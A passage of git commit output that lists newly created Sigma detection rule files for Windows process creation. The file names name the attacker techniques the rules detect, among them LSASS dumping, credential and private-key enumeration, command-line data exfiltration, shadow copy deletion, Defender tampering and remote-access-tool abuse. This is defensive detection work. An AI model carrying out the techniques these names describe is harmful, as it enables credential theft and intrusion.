tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_open_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_query_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_screensaver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_software_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_export_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_import_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regini_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regini_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_logon_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_remote_time_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_adfind.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_autoit.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_browsercore.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_createdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_curl.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_office_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_paexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_renamed_vmnat.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_no_params.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_script_run.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_sys.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_runonce_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_create_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_disable_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_query.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sc_stop_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_delete.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_disable.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_schtasks_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sdclt_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_secedit_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_shutdown_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_shutdown_logoff.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_squirrel_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ssh_port_forward.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_16bit_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_appx_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_automated_collection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_double_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_execution_path.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_image_missing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_network_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntds.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_office_token_search.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_parents.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_progname.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_service_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_service_dir.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_service_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_sysnative.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_userinit_child.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_workfolders.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysprep_appdata.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_systeminfo_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tapinstall_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tar_compression.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tar_extraction.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_taskkill_sep.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml create mode 100644 